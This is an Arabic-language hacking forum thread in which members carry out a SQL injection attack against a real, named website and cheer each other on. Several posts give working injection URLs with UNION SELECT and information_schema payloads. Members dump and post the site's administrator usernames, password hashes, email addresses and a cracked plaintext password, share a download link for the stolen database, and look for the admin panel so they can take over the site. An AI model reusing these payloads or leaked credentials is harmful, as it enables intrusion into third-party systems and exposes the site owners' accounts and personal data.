|
موقع مصاب - اصدار قاعدة البيانات 5 [align=center]السلام عليكم الموقع مجرب و الثغرة ناجحة 100/100 و أنا لم أرد وضع اليوزر و الباسوورد حتى يتدرب عليه المبتدئين [hide]http://www.bible-history.com/subcat.php?id=-23%20union%20select%20version%28%29[/hide] بالتوفيق[/align] |
جاء في وقته حلو بتعلم عليه تسلم ايدك.. :) |
[align=center]الله يبارك فيك [/align] |
[align=center]شكرا على المرور شباب ان شاء الله ستكون هناك مواقع جديدة[/align] |
[align=center][/align]بارك الله فيك في ميزان حسناتك باذن الله تحياتي |
mezyana khoua |
تفضلو يا إخواني :666: كود PHP: |
اقتباس:
[align=center][/align]حبيبي مشكور بارك الله فيك لكن انا الان جربت حقن الموقع من جديد وطلع معاي معلومات غير شكل طلع اليوزر : jc وطلع الباسورد : mos3s [align=center][/align]انا لو معاي لوحة التحكم كنت جربت ادخل فيه حتى اتاكد اي واحد الصح بس للاسف ما لقيتها.. الي يلقي لوحة التحكم يدخل ويجرب وحلال عليه الموقع ^_^ تحياتي |
أضف الأمر ID لتعرف أيهما الأول |
هذا اليوز الذي إكتشفته يحمل رقم 3 لاكن ماذام الموقع ليس مفتوح التسجيل إذن كلهم من الإذارة كود PHP: |
[align=center][/align] الان سحبت قاعدة البانات كلها ^_^ وكلامك صحيح ما في اي اعضاء فقط ادارة وهما ثلاثة وعلى الترتيب هيك : 1-admin 2-jc 3-rusty والباس لكل واحد على الترتيب : 1-a1fba67e72b37d0ba83c2cc937172ec8eb1fda6d 2-b404bbb52c91fe1f291ba9c2719aa7d916dc55e5 3-3a5fbfe524ec4319455769d5462eb2c4ac4cbe79 راح احاول افك التشفير باذن الله... ايميلاتهم كمان على الترتيب : 1-jim@bible-history.com 2-jim@wanned.com 3-rusty@bible-history.com عملت سيف لقاعدة البيانات ورفعتها...حملوها وحصلو رابط لوحة التحكم وحلال عليكم الموقع ^_^ لتحميل القاعدة من هنا : http://www.multiupload.com/QK98XDX9WT |
[align=center]Master vbspiders ------------------- بارك الله فيك عزيزي[/align] |
جاري التجربة يا ولد البلاد |
يا وليد بلادي قولي وعلاه الأمر +from+information_schema+columns مايمشيش في الموقع ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ و أنا جربت نزع علامة الزائد و كذلك نفس الخال http://www.bible-history.com/subcat.php?id=-23 union select version()+from+information_schema+columns |
[align=center] اقتباس:
ذلك الأمر لا يوضع لوحده اليك الخطوات ... أفترض أنك تعرف استخراج الاصدار بعدها ستضيع هذا الأمر في الأخير from+information_schema.columns+where+column_name+ LIKE+CHAR(37, 112, 97, 115, 37) و تضع الأمر التالي في مكان أحد الأعمدة المصابة concat(table_name,0x3a,column_name,0x3a,table_sche ma) فيصبح الرابط للموقع الذي وضعته أنا كالتالي http://www.bible-history.com/subcat....20115,%2037%29 سيظهرلك هذا السطر bho_board_users:user_newpassword:bible_history و أظن أنك تعرف كيف تكمل على العموم ان واجهتك مشكلة ضعها هنا[/align] |
اقتباس:
ههههههههههههههههههههههههههههههههههههههههه شوف أخي الموقع إشتغل عادي اليوم http://www.bible-history.com/subcat....hema.columns-- لا أعلم لماذا لم يشتغل البارحة أنت لم تفهم قصدي أنا قصدت أنه عند إضافة الإستعلام +from+informaion_schema.columns لازم يشتغل الموقع عادي من دون أخطاء حتى نعرف أنو الموقع ليس عامل حظر لهذا الإستعلام حتى نستطيع إكمال الحقن smilies15 |
هههههههههههههههههههههههههههههههههههههههههههههههههه ههه أنا جبت اليوزر و الباس عادي من دون تشفير ههههههههههههههههههههههههههههههههههههههههههههههههه و الحقنة هاهي user = jc pass = Mos3s أرجو أن يستفيد الأعضاء الكرام + شكر خاص لك يا ولد بلادي dz-fox |
a |
هل من أحد خمن لوحة التحكم لنجرب الباس و اليوزر ....... |
مشكووور حبيببي الله يسلم ايدك |
مشكووووووووور جاري التجريب |
نعم اخي اليوزر والباس هكذا اليوزر jc الباس Mos3s استطعت الوصول لها من خلال الجدول administrators:admin_password:bible_history ولكن عند تستخدام الجدول bho_board_users:user_newpassword:bible_history وجدت اسم ادمين اخر وكلمة السر مشفرة تشفير غريب 42 حرف تقريبا بعد تخمين لوحة الأدارة لقيتها وهي http://www.bible-history.com/admin1/ بس عند الدخول اليها يظهر خطأ ما بعرف ليش يمكن من المتصفح او شي اخر ..... وهو: Authorization Required This server could not verify that you are authorized to access the ******** requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required. وهي الحقنة اللي استعملتا ليتعلم منها المبتدئين (وانا منهم) هههه http://www.bible-history.com/subcat....ministrators-- الله يعطيك العافية ومشكور |
شكرا |
يعطيك العافية بارك الله فيك |
مشكووووووووووووووووووووووووووووووsmilies11 وووووووووووووووووووووووووووووsmilies11 رررررررررررررررررررررررررررررsmilies11 |
نتابع |
tnx |
thxxxxxxxxxxxxxxxxx |
thanksssssssssss |
1111111111111111 |
بارك الله فيك في ميزان حسناتك باذن الله |
ddd |
يعطيك الصحا خو سبقوني ههههههههههههههه |
مكشور يا أخي |
مسار لوحة التحكم هي http://www.bible-history.com/admin1/admin.php |
شكرااااااااا |
مشكووووووووووووووووووووووووووووووhttp://www.vbspiders.com/vb/images/s...20%2820%29.gifاخي بارك الله فيك |
بالفعل المسار هو http://www.bible-history.com/admin1 ولكن غير مصرح بالدخول لازم اي بي معين عشان نجرب الباس واليوزر ولسة هجرب تاني |
مشكور و ماقصرت |
| الساعة الآن 09:06 AM |
[ vBspiders.Com Network ]